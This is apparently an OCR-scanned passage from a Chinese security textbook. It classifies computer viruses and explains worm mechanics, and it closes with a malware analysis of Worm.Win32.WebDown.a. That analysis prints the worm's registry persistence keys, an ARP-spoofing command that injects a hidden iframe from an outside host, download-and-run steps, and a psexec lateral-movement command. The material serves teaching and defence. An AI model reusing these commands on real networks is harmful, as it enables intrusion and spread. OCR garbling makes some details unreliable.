5. 根据 计算 机 病毒 隐藏 的 媒体 来 划分 

根据 病毒 隐藏 的 媒体 ,计算 机 病毒 可 以 分 为 网 络 型 病毒 ,文件 型 病毒 ,引导 区 型 病毒 和 
混合 型 病毒 4 种 。 

(1) 网 络 型 病毒 。 攻 击 对 象 为 网 络 中 的 可 执行 文件 ,网 络 型 病毒 利用 计算 机 网 络 进行 
传播 。 

(2) 文件 型 病毒 。 攻 击 对 象 为 计算 机 中 存储 的 文件 (如 COM EXE 及 DOC 等 ) 。 

(3) 引导 区 型 病毒 。 攻 击 对 象 为 硬盘 的 启动 扇 区 (Boot) 和 硬盘 的 引导 扇 区 (MBR) 。 

(4) 混合 型 病毒 。 混 合 型 病毒 同时 具有 引导 区 型 病毒 和 文件 型 病毒 的 特征 ,如 多 型 病 
毒 ( 文 件 型 和 引导 型 ) 的 攻击 对 象 为 存储 在 硬盘 中 的 文件 和 硬盘 引导 扇 区 两 种 目标 。 混 合 型 
病毒 通常 都 具有 加 密 和 变形 算法 ,使 用 非法 的 途径 入侵 计算 机 系统 ,所 以 这 类 病毒 的 危害 性 
更 大 。 

6. 根据 计算 机 病毒 传染 的 方式 来 划分 

根据 病毒 传染 的 方式 ,可 以 将 计算 机 病毒 分 为 以 下 4 种 。 

(1) 电子 邮件 病毒 。 以 网 络 上 的 电子 邮件 为 媒介 传播 的 计算 机 病毒 。 

(2) USB 盘 病 毒 。 以 USB 盘 为 媒介 传播 的 计算 机 病毒 。 

(3) 网 页 病毒 。 以 网 页 为 媒介 传播 的 计算 机 病毒 。 

(4) 计算 机 文件 病毒 。 以 计算 机 文件 为 媒介 传播 的 计算 机 病毒 。 
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7. 根据 计算 机 病毒 的 危害 程度 来 划分 

不 同 的 计算 机 病毒 对 计算 机 系统 的 危害 程度 差别 很 大 。 根 据 危 害 程度 ,计算 机 病毒 可 
分 为 良性 病毒 和 恶性 病毒 两 类 。 

(1) 良性 病毒 。 良 性 病毒 包含 的 程序 代码 会 对 计算 机 系统 产生 间接 的 破坏 作用 。 由 于 
不 破坏 计算 机 系统 和 其 中 的 数据 ,因此 良性 病毒 的 危害 程度 轻微 ; 但 是 良性 病毒 占用 了 系 
统 资源 ,干扰 了 计算 机 的 正常 工作 。 用 户 不 要 轻视 良性 病毒 对 计算 机 系统 造成 的 危害 : 它 
们 会 降低 计算 机 系统 的 运行 效率 ,耗费 内 存 资源 和 磁盘 存储 空间 。 国 内 出 现 的 “ 圆 点 ?病毒 
就 属于 典型 的 良性 病毒 。 

(2) 恶性 病毒 。 恶 性 病毒 包含 的 程序 代码 中 存在 破坏 计算 机 系统 的 操作 ,在 病毒 传染 
时 会 对 计算 机 系统 产生 直接 的 破坏 作用 。 恶 性 病毒 对 计算 机 系统 的 危害 为 : 破坏 计算 机 系 
统 中 存储 的 数据 文件 ; 终止 计算 机 的 正常 工作 ; 中 断 系 统 正常 的 输入 和 输出 ; 破坏 硬盘 分 
区 表 信 息 、 主 引导 信息 ,文件 分 配 表 信 息 ; 格式 化 计算 机 硬盘 等 。 由 于 计算 机 系统 属于 一 种 
复杂 而 精密 的 设备 ,因此 有 些 恶 性 病毒 对 其 造成 的 危害 往往 是 无 法 预料 的 甚至 是 灾难 性 的 。 
所 以 说 恶性 病毒 的 危害 程度 是 极其 严重 的 ,它们 是 计算 机 病毒 防治 的 重点 。 

8. 根据 计算 机 病毒 的 功能 来 划分 

根据 病毒 的 功能 来 划分 ,计算 机 病毒 可 以 分 成 几 十 种 类 型 。 不 同 的 杀毒 软件 制造 商 , 对 
计算 机 病毒 的 划分 方法 也 存在 差异 ,甚至 病毒 类 型 下 面 还 有 若干 病毒 的 子 类 型 ,本 书 概括 了 
以 下 一 些 常见 的 病毒 类 型 。 

(1) 感染 型 病毒 (Virus) 。 感 染 型 病毒 人 侵 计 算 机 系统 ,首先 要 选择 宿主 文件 ,将 病毒 
代码 添加 到 宿主 文件 上 ,这 样 病毒 就 会 和 宿主 文件 同时 在 计算 机 系统 中 运行 。 宿 主 文件 感 
染病 毒 后 ,其 正常 功能 不 会 发 生 改 变 , 但 是 其 正常 功能 运行 的 同时 也 会 执行 病毒 的 功能 , 因 
此 这 种 病毒 具有 较 强 的 欺骗 性 。 因 为 感染 型 病毒 隐藏 在 宿主 文件 中 ,宿主 文件 的 功能 没有 
消失 ,因此 用 户 不 能 简单 地 将 染 毒 文件 删除 ,只 能 清除 病毒 。 这 类 病毒 清理 起 来 比较 困难 ， 
因此 它 的 危害 性 最 大 。 

(2) 蠕虫 病毒 (Worm)。 蠕 虫 病毒 的 传播 载体 众多 ,如 操作 系统 漏洞 .电子 邮件 ,局域网 
中 可 共享 的 目录 文件 传输 软件 (如 MSN、OICQ,IRC 等 ) ,移动 存储 设备 (如 USB 盘 、 移 动 
硬盘 ) 等 。 此 外 ,蠕虫 病毒 使 用 其 子 类 型 的 行为 特征 来 表示 病毒 的 传播 方式 。 例 如 ,IM 病 
毒 利用 即时 通信 作为 载体 进行 传播 ; Mail 病毒 借助 电子 邮件 进行 传播 ; MSN 病毒 以 MSN 
作为 媒介 进行 传播 ; ICQ 病毒 利用 ICQ 软件 进行 传播 ; QQ 病毒 借助 OICQ 软件 进行 传 
播 ; P2P 病毒 以 P2P 软件 作为 媒介 进行 传播 ; IR 病毒 利用 ICR 软件 进行 传播 。 

这 类 病毒 的 传播 媒介 广泛 ,传播 能 力 强 ,对 用 户 计 算 机 系统 的 危害 较 大 ,所 以 它 的 危害 
等 级 仅 次 于 感染 型 病毒 ,位 居 第 二 。 

(3) 后 门 程序 (Backdoor)。 后 门 程序 是 指 在 计算 机 系统 用 户 不 知情 甚至 是 不 允许 的 情 
况 下 ,对 被 感染 的 系统 进行 远程 操纵 。 由 于 这 种 程序 在 运行 时 隐藏 了 自身 ,因此 用 户 很 难 通 
过 常规 的 手段 阻止 其 非法 活动 。 作 为 木马 病毒 的 特例 ,后 门 程序 可 以 对 被 攻击 的 对 象 进行 
远程 操纵 (如 文件 管理 、 进 程控 制 等 )。 它 的 危害 等 级 为 第 三 。 

(4) 木马 病毒 (Trojan) 。 木 马 病毒 是 指 在 计算 机 系统 用 户 不 知情 甚至 是 不 允许 的 情况 
下 ,在 被 人 侵 的 系统 上 通过 隐蔽 的 方式 运行 ,而 用 户 很 难 通过 常规 的 手段 阻止 其 非法 活动 。 
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木马 病毒 的 编写 者 受 利益 的 驱使 ,编写 出 了 木马 病毒 的 子 类 型 。 换 句 话说 ,病毒 的 编写 者 通 
过 木马 病毒 子 类 型 的 行为 实现 了 他 们 的 非法 目的 。 例 如 : 

OO TrojanSpy: 非法 获取 用 户 的 个 人 信息 。 

@ PSW: 窃取 用 户 密码 。 

@ DownLoader: 在 被 感染 的 计算 机 系统 上 运行 网 络 上 下 载 的 病毒 。 

@ Clicker: 单 击 指定 的 网 页 。 

@ Dialer: 通过 拨号 的 方式 来 诈骗 计算 机 系统 用 户 金钱 的 程序 。 

@ Dropper: 该 程序 将 自身 伪装 成 正常 的 软件 安装 程序 , 当 用 户 运行 该 程序 时 ,它们 趁 
机 释放 病毒 程序 并 运行 它们 。 

@ Rootkit: 这 种 病毒 子 类 型 属于 “越权 执行 ”的 应 用 程序 。 它 使 用 非法 的 手段 使 自己 
达到 与 内 核 一 样 的 运行 级 别 ,具有 内 核 一 样 的 访问 权限 ,因而 可 以 随意 地 修改 内 核 指令 。 这 
种 病毒 常见 的 运行 方式 为 : 设法 使 内 核 枚 举 进程 的 API 返回 的 数据 忽略 Rootkit 自身 进程 
的 信息 ,这样 常规 的 进程 工具 就 检测 不 到 Rootkit 了 。 

(5) 病毒 工具 (virus tool) 。 病 毒 工具 是 指 在 本 地 计算 机 以 网 络 为 媒介 入 侵 其 他 计算 机 
的 工具 。 

(6) 病毒 生成 器 (constructor)。 病 毒 生成 器 是 指 能 够 产生 不 同 种 类 的 病毒 的 程序 。 病 
毒 一 般 由 几 个 固定 模块 组 成 ,如 传染 模块 、 表 现 模 块 等 。 每 类 模块 都 积累 了 大 量 不 同 的 实 
现 ,从 大 量 实现 中 恰当 的 选择 ,组 合 ,如 同 拼 积木 一 样 就 可 以 产生 新 的 病毒 。 

(7) 搞笑 程序 (joke)。 搞 笑 程序 的 目的 是 轧 弄 计算 机 用 户 , 使 他 们 产生 不 必要 的 心理 
恐惧 ,而 不 是 危害 他 们 的 计算 机 系统 。 

9. 其 他 划分 方法 

(1) 传统 病毒 。 具 备 传染 性 ,能 够 给 被 感染 的 计算 机 造成 破坏 的 程序 代码 。 传 统 病毒 
通过 修改 计算 机 中 的 文件 或 硬盘 引导 扇 区 的 数据 进行 传播 ,通常 分 为 破坏 可 执行 文件 的 文 
件 型 病毒 和 破坏 引导 扇 区 的 引导 型 病毒 。 

(2) 宏 病 毒 (Macro) 。 利 用 Word、Excel 等 的 宏 脚 本 作为 传播 媒介 进行 传播 的 计算 机 
病毒 。 

(3) 恶意 脚本 (Script) 。 能 够 破坏 计算 机 系统 的 脚本 代码 。 亚 意 脚本 包括 批 处 理 脚本 、 
HTML 脚本 JavaScript 和 VBScript 脚本 等 。 

(4) 木马 (Trojan) 程 序 。 木 马 程 序 是 指 隐 藏 在 计算 机 中 ,受到 外 部 用 户 控制 以 窃取 本 
计算 机 信息 或 控制 权 的 程序 。 木 马 程序 的 危害 性 在 于 多 数 有 恶意 的 企图 ,如 非法 占用 系统 
资源 ,降低 计算 机 的 效能 ,危害 本 机 信息 安全 ( 资 取 QQ 账号 .游戏 账号 甚至 银行 账号 ) ,将 本 
计算 机 作为 工具 来 人 侵 其 他 的 网 络 计算 机 等 。 

(5) 黑客 (Hack) 程 序 。 黑 客 程序 以 网 络 为 媒介 攻击 计算 机 网 络 上 的 其 他 计算 机 ,在 运 
行 过 程 中 这 种 程序 类 似 其 他 正常 程序 一 样 有 程序 界面 。 黑 客 程序 破坏 的 目标 是 网 络 上 的 其 
他 计算 机 ,而 对 运行 该 程序 的 本 地 计算 机 则 没有 危害 。 

(6) 蠕虫 (Worm) 程 序 。 蠕 虫 属 于 计算 机 病毒 中 的 一 种 ,但 是 它 与 普通 病毒 之 间 有 着 很 
大 的 区 别 。 一 般 认 为 ,蠕虫 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 病毒 的 一 些 共 性 ,如 传 
播 性 、 隐 蔽 性 、 破 坏 性 等 ,同时 也 具有 自己 的 一 些 特 征 . 如 不 利用 文件 寄生 (有 的 只 存在 于 内 
存 中 ) ,对 网 络 造成 拒绝 服务 .以 及 与 黑客 技术 紧密 结合 等 。 
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(7) 破坏 性 程序 (Harm) 。 和 破坏 性 程序 运行 后 ,执行 一 些 恶意 操作 ,如 删除 硬盘 文件 、 格 
式 化 硬盘 等 ,危害 用 户 的 计算 机 系统 。 常 见 的 破坏 性 程序 以 BAT 文件 或 EXE 文件 的 形式 
存在 ,有 一 部 分 破坏 性 程序 和 恶意 网 页 相 结合 ,对 用 户 的 计算 机 系统 造成 更 大 的 危害 。 


11.1.4 计算 机 病毒 的 破坏 行为 和 作用 机 理 


1. 计算 机 病毒 的 破坏 行为 

不 同 的 病毒 针对 计算 机 系统 实施 的 破坏 行为 也 有 所 不 同 ,其 中 有 代表 性 的 破坏 行为 
如 下 。 

(1) 攻击 计算 机 系统 的 数据 区 : 少数 恶性 病毒 攻击 计算 机 的 硬盘 主 引导 扇 区 、Boot 扇 
区 FAT 表 \ 文 件 目录 等 关键 内 容 , 且 受 损 的 数据 无 法 进行 恢复 。 

(2) 攻击 系统 文件 : 其 表现 为 删除 系统 文件 ,修改 系统 文件 的 名 称 ,替换 系统 文件 的 内 
容 , 删 除 部 分 程序 代码 等 。 

(3) 攻击 系统 内 存 : 任何 程序 要 想 执 行 必须 要 获得 系统 的 内 存 资源 ,这 样 内 存 也 就 进 
和 了 病毒 攻击 的 范围 。 病 毒 攻击 内 存 的 方式 主要 有 窃取 内 存 的 控制 权 ,占用 大 量 内 存 , 更 改 
内 存 总 量 。 

(4) 干扰 系统 运行 : 拒绝 和 干扰 用 户 指 令 的 运行 ,系统 内 部 堆栈 溢出 ,侵占 特殊 数据 
区 ,更改 时 钟 ,自动 重启 计算 机 ,导致 计算 机 死机 等 。 

(5) 系统 速度 降低 : 不 少 病毒 的 程序 中 存在 无 意义 的 空 循环 ,导致 计算 机 空转 ,系统 速 
度 明 显 降 低 。 

(6) 攻击 系统 磁盘 : 删除 硬盘 中 的 数据 ,不 存盘 ,存盘 操作 变 为 读 取 磁 盘 操 作 ,存盘 时 

(7) 扰乱 系统 屏幕 显示 : 字符 显示 错乱 .跌落 .环绕 、 倒 置 ,光标 下 跌 滚屏、 抖动 等 。 

(8) 攻击 系统 键盘 : 单 击 按键 响 铃 ,封锁 键盘 ,替换 字符 ,删除 数据 缓冲 区 中 的 字符 , 字 
符 的 重复 输入 。 

(9) 攻击 系统 扬声器 : 发 出 异常 的 声音 ,如 演奏 曲子 声 、 警 笛 声 、 炸 弹 噪声 、 鸟 鸣 声 、 嘟 
嘟 声 , 哮 噶 声 。 

(10) 攻击 系统 CMOS: 对 系统 CMOS 区 进行 非法 写 入 操作 ,破坏 系统 CMOS 区 中 的 
原 有 数据 。 

(11) 干扰 系统 打印 机 : 导致 打印 机 打印 不 连续 ,替换 字符 等 。 

2. 计算 机 病毒 的 作用 机 理 

病毒 的 作用 机 理 表现 在 其 引导 传染 和 破坏 3 个 方面 。 

(1) 计算 机 病毒 的 引导 机 理 。 

计算 机 病毒 通常 寄生 在 系统 磁盘 引导 区 和 可 执行 文件 中 。 病 毒 的 寄生 方式 有 潜 代 和 链 
接 两 种 。 一 般 情况 下 ,计算 机 病毒 通过 潜 代 的 方式 寄生 在 系统 的 引导 扇 区 ,它们 通过 链接 的 
方式 寄生 在 可 执行 的 文件 中 。 计 算 机 病毒 的 潜 代 寄生 方式 为 ,病毒 侵占 了 引导 扇 区 中 系统 
文件 的 空间 首先 寄生 在 系统 引导 区 , 当 计算 机 系统 启动 时 ,病毒 程序 会 被 自动 装载 到 系统 内 
存 中 并 被 执行 ,其 次 病毒 的 干扰 程序 和 破坏 程序 会 被 装载 到 内 存 的 相应 位 置 并 且 在 特定 的 
条 件 下 被 激活 ,使 得 计算 机 系统 运行 被 感染 的 病毒 。 
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(2) 计算 机 病毒 的 传染 机 理 。 

所 谓 传染 ,是 指 计算 机 病毒 从 硬盘 中 的 一 个 程序 传播 到 另 一 个 程序 ,从 一 台 计算 机 感染 
另 一 台 计 算 机 的 动态 过 程 。 一 般 来 说 ,计算 机 病毒 传播 的 载体 是 U 盘 或 移动 硬盘 ,这 些 载 
体 是 计算 机 病毒 寄生 的 温床 。 当 然 ,病毒 的 传染 需要 满足 特定 的 条 件 , 一 般 来 说 有 两 种 情 
况 。 一 是 计算 机 病毒 的 被 动感 染 。 当 计算 机 用 户 使 用 移动 硬盘 或 U 盘 等 外 接 设备 时 ,病毒 
会 寄生 在 这 些 设备 中 从 一 台 计 算 机 传播 到 另 一 台 计 算 机 ,或 是 以 网 络 流氓 程序 为 传播 媒介 
从 一 台 计 算 机 传播 到 其 他 的 计算 机 。 二 是 计算 机 病毒 的 主动 感染 。 计 算 机 病毒 程序 被 激活 
需要 满足 特定 的 条 件 , 当 这 些 条 件 满足 时 ,系统 启动 时 这 些 病 毒 程序 会 被 自动 激活 ,开始 从 
一 个 载体 向 另外 的 载体 传播 和 扩散 。 

(3) 计算 机 病毒 的 破坏 机 理 。 

计算 机 病毒 的 破坏 机 制 类 似 病毒 的 传染 机 制 。 计 算 机 病毒 通过 更 改革 一 中 断 向 量 的 人 
口 地 址 使 该 中 断 向 量 指向 病毒 程序 的 破坏 模块 。 在 这 种 情况 下 , 当 系 统 满足 了 该 中 断 向 量 
时 ,激活 病毒 程序 的 条 件 得 到 满足 ,计算 机 病毒 开始 运行 。 计 算 机 病毒 运行 时 ,会 删除 部 分 
系统 文件 , 极 大 地 干扰 了 操作 系统 和 正常 程序 的 运行 。 


11.2 计算 机 蠕虫 病毒 


11.2.1 蠕虫 病毒 的 原理 与 特征 


1. 蠕虫 病毒 的 原理 

蠕虫 病毒 一 般 是 由 主 程序 和 引导 程序 两 部 分 构成 的 。 主 程序 成 功 入 侵 计算 机 后 ,就 会 
读 取 网 络 公共 配置 文件 ,同时 运行 显示 当前 网 络 联机 状态 信息 的 计算 机 系统 实用 程序 ,来 获 
取 和 感染 计算 机 联网 的 其 他 计算 机 的 信息 。 这 些 计算 机 信息 包含 了 一 些 系统 的 缺陷 ,蠕虫 
病毒 正 是 利用 这 些 系统 缺陷 ,在 远程 计算 机 上 建立 病毒 引导 程序 的 。 注 意 ,不 要 忽视 这 些 称 
为 引导 程序 的 小 程序 ,恰恰 是 这 些小 程序 将 蠕虫 病毒 引入 了 病毒 感染 的 每 台 计 算 机 。 

2. 蠕虫 病毒 的 特征 

(1) 独立 性 较 强 。 与 传统 计算 机 病毒 相 比 ,蠕虫 病毒 具有 与 众 不 同 的 传播 途径 和 破坏 
能 力 。 传 统计 算 机 病毒 严重 地 依赖 宿主 程序 ,病毒 将 自己 的 程序 代码 插入 到 宿主 程序 中 , 当 
宿主 程序 运行 时 病毒 便 趁 机 取得 系统 的 控制 权 , 从 而 对 计算 机 系统 进行 传染 和 破坏 。 蠕 虫 
病毒 属于 一 段 独立 的 程序 代码 ,不 需要 宿主 程序 作为 传播 媒介 ,因此 彻底 地 摆脱 了 宿主 程序 
的 束缚 ,从 而 更 加 积极 地 实施 主动 攻击 。 

(2) 寻找 系统 漏洞 实施 主动 攻击 。 蠕 虫 病毒 首先 寻找 操作 系统 的 各 种 漏洞 ,然后 针对 
这 些 漏洞 实施 有 的 放 矢 的 主动 攻击 。“ 尼 姆 达 ” 病 毒 的 设计 者 利用 了 Windows 操作 系统 IE 
浏览 器 的 漏洞 设计 出 了 这 种 病毒 ,即使 计算 机 用 户 没 有 打开 感染 了 病毒 的 电子 邮件 附件 ,该 
病毒 也 能 够 被 激活 ;“ 红 色 代码 ”病毒 的 设计 者 利用 了 微软 Internet 信息 服务 软件 的 漏洞 
(idq. dll 远程 缓存 区 溢出 ) 设 计 出 了 这 种 病毒 ,该 病毒 主要 攻击 Internet 上 的 服务 器 ;“2003 
蠕虫 王 ” 病 毒 的 设计 者 利用 微软 数据 库 系统 的 一 个 漏洞 设计 出 了 这 种 病毒 ,该 病毒 能 够 在 网 
络 上 进行 快速 的 传播 。 
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(3) 传播 范围 更 广 , 传 播 速 度 更 快 。 蠕 虫 病毒 不 仅 危 害 本 地 计算 机 ,而 且 还 会 以 本 地 计 
算 机 为 媒介 ,向 网 络 中 所 有 与 之 相连 接 的 计算 机 发 动 攻 击 , 因 此 蠕虫 病毒 比 传统 病毒 具有 更 
广泛 的 传播 范围 。 蠕 虫 病毒 能 够 使 用 各 种 传播 途径 (恶意 网 页 .Email、 网 络 中 共享 的 文件 夹 
及 存在 着 大 量 漏洞 的 计算 机 服务 器 ) ,多 种 传播 手段 在 互联 网 中 进行 快速 的 传播 ,因此 蠕虫 
病毒 可 以 在 半日 内 波及 全 球 的 计算 机 网 络 ,给 广大 计算 机 用 户 造成 灾难 性 的 经 济 损失 。 

大 家 可 以 通过 下 面 的 计算 来 理解 蠕虫 病毒 的 传播 速度 : 假如 蠕虫 病毒 人 侵 了 一 台 网 络 
计算 机 ,这 台 计 算 机 的 地 址 簿 中 存储 了 10 个 用 户 的 电子 邮件 地 址 ,那么 这 10 个 用 户 很 快 就 
会 收 到 病毒 发 送 来 的 电子 邮件 ,如 果 这 10 个 人 的 计算 机 中 又 存储 了 10 个 人 的 电子 邮件 地 
址 ,那么 病毒 很 快 就 会 波及 10X10=100 个 人 ,如 果 病 毒 继续 这 样 在 网 络 上 传播 下 去 ,就 会 
波及 10X10X10==1000 个 人 ,而 病毒 极 有 可 能 在 数 小 时 内 完成 整个 传播 过 程 。 巾 此 可 见 ， 
蠕虫 病毒 能 够 以 惊人 的 速度 在 网 络 上 进行 传播 。 

(4) 采用 高 明 的 方法 进行 伪装 和 隐藏 。 病 毒 的 设计 者 采用 高 明 的 方法 对 蠕虫 病毒 进行 
伪装 和 隐藏 ,其 目的 是 进一步 地 扩大 病毒 的 传播 范围 。 

在 日 常 的 工作 中 ,计算 机 用 户 在 查看 电子 邮件 时 ,都 要 打开 邮件 的 附件 。 如 果 电 子 邮 件 
的 附件 中 包含 病毒 ,那么 打开 附件 的 操作 会 导致 客户 计算 机 感染 病毒 。 因 此 ,用户 产 生 了 这 
样 的 经 验 : 不 打开 电子 邮件 的 附件 就 不 会 感染 计算 机 病毒 。 但 是 ,有 的 蠕虫 病毒 会 将 病毒 
文件 利用 特殊 的 编码 形式 隐藏 在 电子 邮件 的 正文 中 。 这 类 蠕虫 病毒 巧妙 地 利用 了 Mine 的 
漏洞 ,如果 计算 机 用 户 单 击 邮件 正文 ,蠕虫 病毒 就 会 自动 激活 并 在 用 户 计 算 机 的 硬盘 上 
运行 。 

另外 ,一 些 蠕虫 病毒 (“Nimda” 和 “求职 信和 ”等 ) 还 使 用 向 邮件 中 添加 包含 双 扩 展 名 的 附 
件 等 形式 麻痹 计算 机 用 户 ,如 果 用 户 对 电子 邮件 的 处 理 不 当 , 病 毒 就 会 在 网 络 上 进一步 地 进 
行 传播 。 

(5) 使 用 先进 的 技术 。 一 些 病 毒 设计 者 将 蠕虫 病毒 代码 嵌入 到 Internet 网 页 的 脚本 
中 ,利用 Java、VBScript、ActiveX 等 成 熟 技 术 将 病毒 代码 隐藏 在 HTML 页 面 中 。 当 用 户 上 
网 浏览 包含 病毒 的 网 页 时 ,病毒 就 会 趁机 驻 留 在 计算 机 的 内 存 中 并 伺机 而 发 。 此 外 一 些 蠕 
虫 病毒 与 后 门 程序 相 结 合 , 如 “红色 代码 病毒 *。 计 算 机 用 户 感染 这 种 病毒 之 后 , Web 目录 
下 的 Scripts 目录 下 将 自动 产生 一 个 root. exe 后 门 程序 ,病毒 的 传播 者 能 够 利用 这 一 后 门 
程序 达到 远程 控制 染 毒 计算 机 的 目的 。 蠕 虫 病毒 与 黑客 技术 的 融合 ,将 给 广大 计算 机 用 户 
带 来 巨大 的 潜在 威胁 。 


11.2.2 蠕虫 病毒 实例 分 析 


下 面 对 蠕虫 病毒 实例 Worm. Win32. WebDown. a 进行 分 析 。 

蠕虫 病毒 的 侵害 对 象 为 安装 了 Windows 操作 系统 的 计算 机 ,病毒 通过 多 种 方式 ( 枚 举 
局 域 网 网 段 IP 地 址 、 获 取 侵 害 计算 机 当前 连接 、 下 载 IP 地 址 信息 等 ) 获 取 侵 害 计 算 机 的 IP 
地 址 ,然后 针对 这 些 地 址 进行 试探 性 地 传播 。 病 毒 的 设计 者 使 用 VC6. 0 编写 了 该 程序 ,并 
对 其 进行 了 加 过 保护 。 

1. 检查 传播 方式 

病毒 在 网 络 传播 的 过 程 中 ,首先 判断 自己 是 否 是 以 “%system32%\IME\svchost. exe” 
的 方式 一 一 服务 方式 传播 , 若 不 是 则 进行 自身 繁殖 的 初始 化 操作 。 
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2. 病毒 的 初始 化 

病毒 清除 侵害 对 象 硬盘 中 的 文件 “%system32%\IME\svchost. exe”, 然 后 将 自己 复制 
为 该 文件 ,同时 将 该 文件 属性 设置 为 系统 和 隐藏 ,最 后 病毒 调用 函数 CreateProcessA 启动 
该 文件 。 病 毒 进行 上 述 操作 后 ,释放 并 执行 批 处 理 文件 rs. bat, 通 过 这 种 方法 来 销毁 自己 。 

3. 以 服务 传播 方式 注册 

病毒 通过 调用 一 系列 函数 (StartServiceCtrlDispatcher .CreateServiceA 等 ) 注 册 名 称 为 
“Alerter COM 十 ”目标 为 “上 system32%\IME\ svchost. exe” 的 服务 ,然后 使 用 函数 
StartServiceA 启动 这 项 服务 。 

4. 病毒 的 服务 过 程 

为 了 保证 在 同一 时 刻 只 有 一 个 服务 实例 在 染 毒 计算 机 上 运行 ,病毒 调用 函数 
CreateMutexA 试 着 产生 名 称 为 *Alerter COM 十 ”的 互 斥 变量 ,如 果 失 败 则 自动 退出 。 

病毒 运行 4 个 线程 试探 着 进行 网 络 传播 和 下 载 。 病 毒 根据 其 代码 中 标志 位 的 数值 决定 
是 否 对 本 地 固定 逻辑 盘 建 立 自动 运行 机 制 。 病 毒 注册 并 生成 名 称 为 “Alerter COM 十 ”的 隐 
藏 窗口 ,该 窗口 的 类 名 为 “WebDown”, 同 时 运行 消息 循环 ,不 断 地 向 这 个 隐藏 窗口 发 送 
“WM_DEVICECHANGE” 消 息 。 

5. 在 染 毒 计算 机 硬盘 上 建立 AutoRun. inf 文件 实现 自动 启动 

病毒 根据 其 代码 中 标志 位 的 数值 决定 是 否 对 染 毒 计算 机 硬盘 建立 自动 运行 机 制 。 如 果 
标志 位 的 数值 为 1, 则 病毒 通过 对 染 毒 计算 机 逻辑 盘 依 次 调用 函数 GetDriveTypeA ,在 上 述 
硬盘 上 建立 自动 运行 机 制 。 病 毒 将 自身 复制 到 该 逻辑 盘 的 根 目录 下 , 重 命名 为 “setup. 
exe”, 同 时 生成 “AutoRun. inf” 文 件 以 达到 自动 启动 的 目的 。 病 毒 将 文件 “setup. exe” 和 
“AutoRun. inf” 的 文件 属性 更 改 为 系统 和 隐藏 。 

6. 窗口 消息 的 处 理 

在 窗口 循环 中 ,病毒 需要 处 理 以 下 消息 。 

(1) WM_CLOSE、WM_DESTROY 消息 ,病毒 运行 默认 窗口 的 处 理 过程 。 

(2) WM_CREATE 消息 ,在 生成 窗口 时 ,病毒 调用 创建 计时 器 函数 SetTimer 建立 两 个 
计时 器 Timer, 时 间 间 隔 分 别 为 1 秒 和 20 分 钟 ,回调 方式 为 接收 WM_TIMER 消息 。 

(3) WM_TIMER 消息 ,病毒 每 隔 1 秒 就 运行 一 段 病毒 代码 以 便 破 坏 本 地 计算 机 上 的 
反 病毒 软件 并 复制 病毒 自身 ,每 隔 20 分 钟 尝 试 把 文件 http://www. XXXXX. cn/jj/ 
svchOst. exe 下 载 为 本 地 %system32%\down. exe, 同 时 运行 文件 down. exe。 

(4) WM_DEVICECHANGE 消息 ,病毒 通过 处 理 该 消息 获得 新 插入 本 地 计算 机 的 可 
移动 设备 的 信息 ,并 感染 该 设备 (向 新 设备 中 写 入 病毒 并 建立 自动 运行 机 制 )。 

7. 干扰 反 病 毒 软件 和 自身 繁殖 

病毒 通过 接收 WM_TIMER 消息 ,每 过 1 秒 检测 同时 干扰 本 地 计算 机 上 的 反 病 毒 软件 
运行 。 病 毒 通过 调用 一 系列 函数 (GetCursorPos、WindowFromPoint、GetParent 等 ) 取 得 系 
统 当 前 窗口 和 其 顶层 父 窗口 的 信息 ,从 而 检测 它们 的 窗口 标题 中 是 否 包含 安全 卫士 .杀毒 、 
注册 表 、 进 程 、 木 马 、 防 御 、 防 火 墙 病 毒 、 检 测 、 金 山 、 江 民 、 卡 巴 斯 基 等 信息 。 

如 果 包 括 上 述 信息 ,病毒 通过 发 送 一 些 消 息 ( 如 WM_DESTROY、WM_CLOSE) 来 破 
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坏 这 些 窗口 ,从 而 干扰 本 地 计算 机 上 的 反 病 毒 软件 运行 。 

病毒 通过 接收 WM_TIMER 消息 ,每 过 1 秒 繁殖 一 次 并 重 写 本 地 计算 机 的 注册 表 , 以 
此 来 隐藏 自己 。 病 毒 将 自己 隐藏 为 %system32% 下 的 可 执行 文件 internt. exe 和 progmon. 
exe, 并 按照 下 面 的 内 容重 写 注册 表 。 


HKEY_LOCAL MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\ Advanced\ Folder\ 
Hidden\SHOWALL"CheckedValue" = 0X00000000 

HKEY_LOCAL_ MACHINE\ SOFTNRRE\Microsoft\ Windows\ CurrentVersion\Run" Internt" = % SYSTEM% \ 
INTERNT. EXE 

HKEY_LOCAL MACHINE\SOFTHARE\Microsoft\Windows\CurrentVersion\Run"Program file" = % SYSTEM% 
\PROGMON. EXE 


病毒 需要 运行 的 4 个 工作 线程 如 下 。 

工作 线程 1: 病毒 从 网 址 http://www. XXXXX. cn/jj/ 下 载 文 件 conn. exe 到 本 地 计算 
机 后 ,将 文件 conn. exe 改名 为 BindF. exe, 然 后 将 改名 后 的 文件 存储 到 目录 %system32%\ 
下 ,最 后 运行 该 文件 。 

工作 线程 2: 病毒 从 网 址 http://www. XXXXX. cn/jj/ 下 载 文 件 ArpW. exe nogui. 
exe、wpcap. dll ,packet. dll .wanpacket. dll 和 arp. exe 到 %system32%\ 目 录 。 

病毒 取得 当前 网 段 ( 如 218. 9. 29. 162) ,用 字符 串 %s2 一 %s255 替换 掉 最 后 一 个 字段 ， 
然后 以 下 面 方式 启动 Arp 欺骗 病毒 。 


"ArpW. exe — idx 0 ~ ip 218.9.29.2—255 — port 80 ~ insert 
"< iframe src = 'http://www.1988712. cn/jj/index. htm';width= 0 height = 0>"" 


病毒 通过 运行 arp. exe, 将 病毒 代码 嵌入 到 局 域 网 的 http 包 中 。 

工作 线程 3: 病毒 从 网 址 http://www. XXXXX. cn/jj/ 下 载 文 件 psexec. exe 和 server. 
exe 到 本 地 计算 机 的 %system32% 目 录 。 在 工作 线程 3 中 ,病毒 每 隔 30 分 钟 循 环 执行 以 下 
代码 来 传染 网 络 。 

(1) 传染 局 域 网 中 的 计算 机 。 病 毒 得 到 本 机 的 IP 地 址 后 以 该 卫 了 地 址 为 线索 遍历 本 机 所 
在 的 局 域 网 ,通过 自 带 的 用 户 名 和 密码 秒 尝 试 向 同一 网 段 中 的 其 他 计算 机 的 %system32% 目 
录 中 写 人 文件 psexec. exe 和 server. exe, 然 后 通过 以 下 命令 行 运行 psexec. exe: 


% system32 % \psexec. exe\\218.9.29.2 一 u 用 户 名 -p ' 密 码 ' -c % system32%\servrr.exe—d 


